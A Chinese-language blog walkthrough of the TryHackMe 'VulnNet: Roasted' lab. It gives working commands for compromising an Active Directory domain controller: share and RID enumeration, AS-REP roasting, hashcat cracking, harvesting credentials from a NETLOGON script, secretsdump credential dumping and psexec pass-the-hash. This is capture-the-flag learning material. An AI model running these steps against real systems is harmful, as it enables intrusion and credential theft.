TryHackMe-VulnNet_Roasted

已于 2023-01-15 14:15:41 修改
阅读量122 收藏 1
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: 渗透测试 网络安全 windows 活动目录 AD
于 2023-01-05 21:06:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128570257
版权

VulnNet: Roasted

VulnNet Entertainment刚刚与新雇用的系统管理员一起在其网络上部署了一个新实例。作为一家具有安全意识的公司,他们一如既往地聘请您执行渗透测试,并查看系统管理员的表现。

端口扫描

循例nmap 扫: nmap -sS 10.10.26.181 -p 1-10000 -T5

53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman
9389/tcp open  adws

smb枚举

枚举smb

enum4linux -M -U -S 10.10.26.181

获得信息:

Domain Name: VULNNET-RST
Domain Sid: S-1-5-21-1589833671-435344116-4136949213

枚举smb共享文件夹:

smbclient -L 10.10.26.181

VulnNet-Business-Anonymous   Disk      VulnNet Business Sharing
VulnNet-Enterprise-Anonymous   Disk      VulnNet Enterprise Sharing

使用smbclient分别进入两个文件夹,会得到六个文本文件

有四个文件披露了四个可能的用户名

msrpc sid爆破

但我们有更好的选择,我们可以使用lookupsid.py,通过msrpc sid爆破列举出存在的用户和组:

python3 /usr/share/doc/python3-impacket/examples/lookupsid.py anonymouse@10.10.26.181 | grep SidTypeUser

清洗一下数据,提取用户名,将其保存到文件

AS-REP roasting

python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -usersfile ./test1.txt -dc-ip 10.10.26.181 -no-pass -request VULNNET-RST/

我们将获得 t-skid 的密码hash

如果你细心阅读我们一开始在smb共享获取的那六个文本文件,你就会发现有一个文件中披露了:

Tony Skid 是一名核心安全经理,负责内部基础设施。
我们确保您的数据安全和私密。在保护您的私人信息方面...
我们把它锁得比恶魔岛更紧。
我们与TryHackMe合作,使用128位SSL加密,并创建每日备份。
未经您的许可,我们绝不会向第三方披露任何数据。
放心吧,没有什么能活着离开这里。

我想的应该没错

言归正传,我们将我们获得的密码hash保存到文件,并使用hashcat尝试爆破:

hashcat -a 0 -m 18200 ./hash /usr/share/wordlists/rockyou.txt

旋转-再次smb枚举

我们爆破获得了t-skid的明文密码,我们使用该账户再次进行smb枚举

smbclient //10.10.244.32/NETLOGON/ -U VULNNET-RST/t-skid

smb: \> get ResetPassword.vbs

发现凭据:

strUserNTName = "a-whitehat"
strPassword = "**********"

横向移动

我们尝试再次查看smbNETLOGIN,发现这个账户登不上,那我们尝试通过psexec获得cmd会话,失败,可能是网络原因,发现总是丢包

目标开启了5985端口,再尝试通过winrm

evil-winrm -i 10.10.244.32 -u a-whitehat -p **********

尝试了许多遍,连上了

C:\Users\enterprise-core-vn\desktop> type user.txt

远程转储凭据

卡死我了,我选择放弃使用远程命令行,让secretsdump.py来帮我完成吧

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py VULNNET-RST/a-whitehat@10.10.244.32

最后我们将获得administrator的ntlm hash,我们没有必要破解,因为我们可以进行进行pth

例如:psexec.py、evil-winrm

python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes **********:********* Administrator@10.10.244.32

system.txt在桌面下

Sugobet
关注
专栏目录
计算单词出现的频次,并按频次从高到低排序
moreharder的博客
11-15 3万+
import collections f=open("D:\python\Walden.txt","r").read() f=f.replace(',','').replace('.','').replace('"','').replace(':','') f=f.split() r=collections.Counter(f) print(r) Counter({'the': 6937, 'and': 4547, 'of': 3472, 'to': 3058, 'a': 2966, 'I': 2
TryHackMe新手村
weixin_55154296的博客
04-17 7861
TryHackMe 最近在外网发现了一个在线黑客学习网站:TryHackMe ,缺点是好像需要一些上网技巧,而且全英,免费用户每天只能用一小时,付费(大概一个月6、70)无限制. 以下附上刚入门时的坑 在tutorial的第一个问题,问的是 Follow the steps in this task. What is the flag text shown on the website of the machine you started on this task? 意思我都读懂了,但是我填flag、c
149Echarts - 旭日图(Drink Flavors)
阿甘兄
05-05 1380
效果图 源代码 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>ECharts</title> <!-- 引入 echarts.js --> <script src="js/echarts.min.js">&l...
SerpAPI - Search API
编码时光
03-26 1040
关于 SerpAPI serpapi & google-search-results http 请求示例: Python 调用示例 Basic Examples in Python Search Bing Search Baidu Search Yahoo Search YouTube Search Walmart Search eBay Search Naver Search Home Depot Search Apple App Store Search DuckDuckGo Search Google
Air Fryer Spicy Roasted Peanuts Recipe
xiaoweidegongyu的博客
06-26 1940
Once you try air fryer roasted peanuts, you'll never look back! Crispy, salty, and super satisfying, air fryer roasted peanuts are one of the simplest recipes ever. Store-bought roasted peanuts can contain a host of unwanted ingredients, so I always make m
使用fastText实现文本分类-java版
yeah_you_are的博客
05-26 1786
使用FastText实现文本分类-java版 文本分类又称自动文本分类,是指计算机将载有信心的一篇文本映射到预先给定的某一类别或某几个类别主题的过程,实现这一过程的算法模型叫做分类器。哈哈哈,这一句是从大佬文章中借鉴来得,这是是原文 ,这篇文章具体介绍了文本分类的历史发展和一些分类算法,有兴趣的可以去看看。 我这里主要说的是使用FastText实现文本分类,至于想要弄明白原理的,建议看这里 ,大佬对原理做了很详细的说明,向大佬表示敬意。 依赖 <dependency> <groupI
Qt | TipsWidget-通知组件
m0_72760466的博客
01-07 985
源码可以在Github上下载,后续会不断更新,并且提供C++版本组件,欢迎各位关注。 1. Github :[https://github.com/Rev-RoastedDuck/Qt-RoastedDuck-Widgets.git](https://github.com/Rev-RoastedDuck/Qt-RoastedDuck-Widgets.git
FastText 和 Faiss 的初探了解
江无羡
09-12 642
FastText:由Facebook开源,用于高效学习词语表示和句子分类的组件库。Faiss:由Facebook开源的一个向量数据库,支持开发人员快速搜索彼此相似的多媒体文档的嵌入。它解决了针对基于哈希的搜索进行优化的传统查询搜索引擎的局限性,并提供了更具可扩展性的相似性搜索功能。
Whole Roasted Lemon
Love the end of Yan
10-13 274
From EatingWell.com When you season roast chicken under the skin, as in this recipe, the meat itself gets flavored and the skin becomes nicely browned and crisp. Here, the chicken is roasted on a bed
slow_roasted
09-02
slow_roasted
精品ppt模板PPT素材slow_roasted026
09-02
精品ppt模板PPT素材slow_roasted026
purescript-emo8::roasted_sweet_potato:可以创建表情符号游戏的功能性2D游戏引擎
02-04
情绪8 独特的功能性2D游戏引擎,仅用表情符号即可创建游戏。 [] 这个图书馆是为... 认为只有表情符号才有趣! 想要轻松分享游戏 想要使用PureScript编写清晰的程序 为什么是表情符号?... 可以在任何地方使用的熟悉...
Roasted-Bunny-s-Music-Player:这是我网站的源代码。 https-Music player source code
03-25
Roasted-Bunny-s-Music-Player 是一个音乐播放器项目,其源代码可供公众查看和使用,这符合“系统开源”的标签定义。开源意味着开发者可以访问、修改和分发该软件的源代码,促进协作与创新。这个项目的名称富有创意...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8458
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
B站宋红康JAVA基础视频教程(chapter14数据结构与集合源码)
qq_61033357的博客
09-14 847
当要添加第11个元素的时候,底层的elementData数组已满,则需要扩容,默认扩容为原来长度的1.5倍,并将原有数组中的元素赋值到新数组中。当要添加第11个元素的时候,底层的elementData数组已满,则需要扩容,默认扩容为原来长度的1.5倍,并将原有数组中的元素赋值到新数组中。当要添加第11个元素的时候,底层的elementData数组已满,则需要扩容,默认扩容为原来长度的2倍,并将原有数组中的元素赋值到新数组中。所有的value是可重复,无序的。实现List接口,存储有序的,可以重复的数据。
Apache 的CollectionUtils各种集合操作好用的方法总结
小湘西的博客
09-11 719
是 Apache Commons Collections 提供的一个工具类,包含了许多静态方法,用于操作和处理集合。
[网络][CISCO]CISCO_华为网络设备端口镜像配置
最新发布
一名不太专业的程序员
09-14 622
设置端口侦听:set port mirror source-port mirror-port sampling { always | disable | periodic } [ max-packets-sec < max-packets-sec-value> ] [ piggyback-port ]命令中,mod-port-range指定端口的范围;交换机软件版本3以上。
Java中的linkedList类及与ArrayList的异同
weixin_74141526的博客
09-11 1001
由于涉及的类过多,画起来过于繁琐,这里只展示最外层的继承实现关系可以看到它是继承自AbstractSqquentialList,并且实现了多个接口类,感兴趣的小伙伴可以去深入查看LinkedList具体怎样实现了它们的方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值